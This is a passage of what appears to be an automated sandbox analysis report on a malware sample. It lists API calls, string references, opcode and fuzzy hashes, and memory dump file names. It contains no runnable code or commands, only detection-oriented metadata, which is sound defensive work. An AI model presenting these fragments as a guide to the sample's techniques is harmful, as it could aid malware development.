                                                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                                                                                                                                                              • API String ID: 2574300362-1578401391
                                                                                                                                                                                                                              • Opcode ID: a7f2186df0edeb6cb81b0f10063dff2a53dc8e3c25fdbc3164ac337aa52266be
                                                                                                                                                                                                                              • Instruction ID: 551f2b8ffc9760d58a22cc1e0672e6ab9e1bfc1b421cf3897e45a288dd0af7a3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7f2186df0edeb6cb81b0f10063dff2a53dc8e3c25fdbc3164ac337aa52266be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5E020B45447C1AF9F243EF5A81863637DEEF12605304843DE511D2700EE2ED004C739
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(user32.dll,?,?,6BB8434E), ref: 6BBD73EB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 6BBD7404
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,6BB8434E), ref: 6BBD7413
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                              • String ID: SetProcessDpiAwarenessContext$user32.dll
                                                                                                                                                                                                                              • API String ID: 145871493-397433131
                                                                                                                                                                                                                              • Opcode ID: 9eb07e4257282b676e8734d9c688cdc271d4bdbf8819b0674b20f63d09177190
                                                                                                                                                                                                                              • Instruction ID: 90707486b4eaa72ac1ef2c77705b4324a333e31686b3ee55ad525fb2e8bfe7e3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eb07e4257282b676e8734d9c688cdc271d4bdbf8819b0674b20f63d09177190
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEE01A741013419BE7201FA5E908756BAEDEF05241F008829EA89C3600E7BAD4008B60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(wintrust.dll,?,6BB87266), ref: 6BBB01C8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6BBB01E7
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,6BB87266), ref: 6BBB01FE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                              • String ID: CryptCATAdminReleaseContext$wintrust.dll
                                                                                                                                                                                                                              • API String ID: 145871493-1489773717
                                                                                                                                                                                                                              • Opcode ID: 2a2d9fbd45297bc99beaa966d0e6ac5e5ebf54b264a10b8b0998acc7416d0bf9
                                                                                                                                                                                                                              • Instruction ID: fca4f1c8c7a2a38babd8a6346508fe888a95930b28e403da12537497641a26f8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a2d9fbd45297bc99beaa966d0e6ac5e5ebf54b264a10b8b0998acc7416d0bf9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59E09A74481385DFEF105F65E9087367BEEAB07381F404425E904C3250DB7AC405DB20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(wintrust.dll,?,6BB87297), ref: 6BBB0128
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6BBB0147
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,6BB87297), ref: 6BBB015E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                              • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                                                                                                                                                                              • API String ID: 145871493-1536241729
                                                                                                                                                                                                                              • Opcode ID: 8be7152021e0b3f2e529024ba0b2cd6d6b668e08a5f6b0c06cb5861d8ec406ee
                                                                                                                                                                                                                              • Instruction ID: a3f136e42de8a8afa4e02f9730b6db98edcb150ebb79575cd6f40c9366e931bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8be7152021e0b3f2e529024ba0b2cd6d6b668e08a5f6b0c06cb5861d8ec406ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE09279446285EFEF106F6AEA08736BBEDE707341F408529AA04C7350DBBAC404CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(wintrust.dll,?,6BB87308), ref: 6BBB0178
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6BBB0197
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,6BB87308), ref: 6BBB01AE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                              • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                                                                                                                                                                              • API String ID: 145871493-3354427110
                                                                                                                                                                                                                              • Opcode ID: 065394f742d2df83397bf12a8cad2ae77dfb0efb2915d07e0dc89aec524db806
                                                                                                                                                                                                                              • Instruction ID: 728646122c1ceb96c7e31d3e7cc7463d30dcce4e5c7547f40bd2e00bf7aeff89
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 065394f742d2df83397bf12a8cad2ae77dfb0efb2915d07e0dc89aec524db806
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50E01278482240DBEF105F25EA48B313BEEFB02245F40006AEA9083280DBBAC080DA20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(wintrust.dll,?,6BB87204), ref: 6BBB0088
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6BBB00A7
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,6BB87204), ref: 6BBB00BE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                              • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                                                                                                                                                              • API String ID: 145871493-3385133079
                                                                                                                                                                                                                              • Opcode ID: 1de499de8a8f9b0ba4b74539fbf0a8204c78cff223cf5b150eda724aa22168bd
                                                                                                                                                                                                                              • Instruction ID: adbb93de6d94d54d2ee5d4676f77004e1296e5499ac5d31acf64fd3a546a5978
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1de499de8a8f9b0ba4b74539fbf0a8204c78cff223cf5b150eda724aa22168bd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CE09279445349DFEF10AF66EA187357BEEA70B341F80842AA914C3350DBBAC404DB21
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(wintrust.dll,?,6BB87235), ref: 6BBB00D8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6BBB00F7
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,6BB87235), ref: 6BBB010E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • wintrust.dll, xrefs: 6BBB00D3
                                                                                                                                                                                                                              • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6BBB00F1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                              • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                                                                                                                                                              • API String ID: 145871493-2559046807
                                                                                                                                                                                                                              • Opcode ID: 0a85e096a5d3d9c2e1b77a941f66c6ab10d5ea1d9482a56ece2ffcd6000fbb5f
                                                                                                                                                                                                                              • Instruction ID: 3a1bba42be9c368146dc789880ad2d96654524638fcd00c02f0bcb54012677d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a85e096a5d3d9c2e1b77a941f66c6ab10d5ea1d9482a56ece2ffcd6000fbb5f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DE0B678446345DFEF209F65EA4A7317BEEE707B41F848429A94983640EBBAC444CB20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(kernelbase.dll,?,6BB805BC), ref: 6BBDBAB8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6BBDBAD7
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,6BB805BC), ref: 6BBDBAEC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                              • String ID: VirtualAlloc2$kernelbase.dll
                                                                                                                                                                                                                              • API String ID: 145871493-1188699709
                                                                                                                                                                                                                              • Opcode ID: fe27fb36355316bf6e2a594476a4438e158cc2b6e47d43ffbfc95cc1e0d72275
                                                                                                                                                                                                                              • Instruction ID: d6a7417c1dfef30bbf3166c7cc58dde7cee985f28e88ad55e8b11526dbafe2e3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe27fb36355316bf6e2a594476a4438e158cc2b6e47d43ffbfc95cc1e0d72275
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DE09274402382DBDB109F62E958B257BEDE706324F18542AA90483200FBBAC009CA24
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(wintrust.dll,?,6BB877C5), ref: 6BBDC298
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6BBDC2B7
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,6BB877C5), ref: 6BBDC2CC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • CryptCATAdminCalcHashFromFileHandle, xrefs: 6BBDC2B1
                                                                                                                                                                                                                              • wintrust.dll, xrefs: 6BBDC293
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                              • String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
                                                                                                                                                                                                                              • API String ID: 145871493-1423897460
                                                                                                                                                                                                                              • Opcode ID: 4c0e755d248b2e29c90eb6dae79000971a875bb23f6e86e8b3e102286c9297e5
                                                                                                                                                                                                                              • Instruction ID: 354f83c8812dff16155c081aef61dbd452f1b8b2a11cf1c879cbffd7dfaf11c4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c0e755d248b2e29c90eb6dae79000971a875bb23f6e86e8b3e102286c9297e5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5E0B678442346EFEF106F69E908722BFEDEB06304F440629A90883710E7BBC408CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(wintrust.dll,?,6BB877F6), ref: 6BBDC248
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6BBDC267
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,6BB877F6), ref: 6BBDC27C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                              • String ID: CryptCATAdminAcquireContext$wintrust.dll
                                                                                                                                                                                                                              • API String ID: 145871493-3357690181
                                                                                                                                                                                                                              • Opcode ID: 5940008e3ed9469a2c5e6390a160fe3c9738998c1d3d100c514535e969b60e2f
                                                                                                                                                                                                                              • Instruction ID: ba4b52221093aea5775b582137d7a11e1b6b57d0f7aeacbec393dd63d5bac016
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5940008e3ed9469a2c5e6390a160fe3c9738998c1d3d100c514535e969b60e2f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96E0B678451341DBEF186F66E9087257EEDEB0B344F10446AE904C3210E7BAC444DF68
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(wintrust.dll,?,6BBDC1DE,?,00000000,?,00000000,?,6BB8779F), ref: 6BBDC1F8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6BBDC217
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,6BBDC1DE,?,00000000,?,00000000,?,6BB8779F), ref: 6BBDC22C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                              • String ID: WinVerifyTrust$wintrust.dll
                                                                                                                                                                                                                              • API String ID: 145871493-2991032369
                                                                                                                                                                                                                              • Opcode ID: 91dffc99f489cd791310a417f3d68a3ba36917e83e574f8daa7ec10b9b5728fd
                                                                                                                                                                                                                              • Instruction ID: 4b02c2f4282d2d9298c28ded96315f2e3584bb62478d336bc9e2aa550d5e93f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91dffc99f489cd791310a417f3d68a3ba36917e83e574f8daa7ec10b9b5728fd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4E0B678442781DBEF106F65E90872A7EEDAB06344F000529E904C3711E7BBC404CB70
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6BB85FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BB860F4
                                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6BB85FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BB86180
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,6BB85FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB86211
                                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6BB85FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BB86229
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,6BB85FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB8625E
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6BB85FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB86271
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: freemalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3061335427-0
                                                                                                                                                                                                                              • Opcode ID: aa7845c05984dbd70b72cc727cc13445a190aef3e21a7522cc50fb4360020508
                                                                                                                                                                                                                              • Instruction ID: ab6ed0ba928b6fe129e146b624bd4fc79e07fd1a7ca00c1aec19adb9fab3fff4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa7845c05984dbd70b72cc727cc13445a190aef3e21a7522cc50fb4360020508
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 335199B1A102468FEB14DFA8D881BAEB7B5EF45308F100479CA17DB312E739EA55CB51
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F228
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F36D
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 348468850-0
                                                                                                                                                                                                                              • Opcode ID: 89292260d13e06a3ccf44185258d8082ce40877a689944c47bb1047c3bb279de
                                                                                                                                                                                                                              • Instruction ID: 34556820f6e5338ba8e8a845a83fb71131f6fb13afd6d5a2f2d9a2f2ab0dc7f0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89292260d13e06a3ccf44185258d8082ce40877a689944c47bb1047c3bb279de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F514FB5A04209DFCB18CF54D595AAE7BB6FF48308F10817DE802AB390D734EA95CB95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
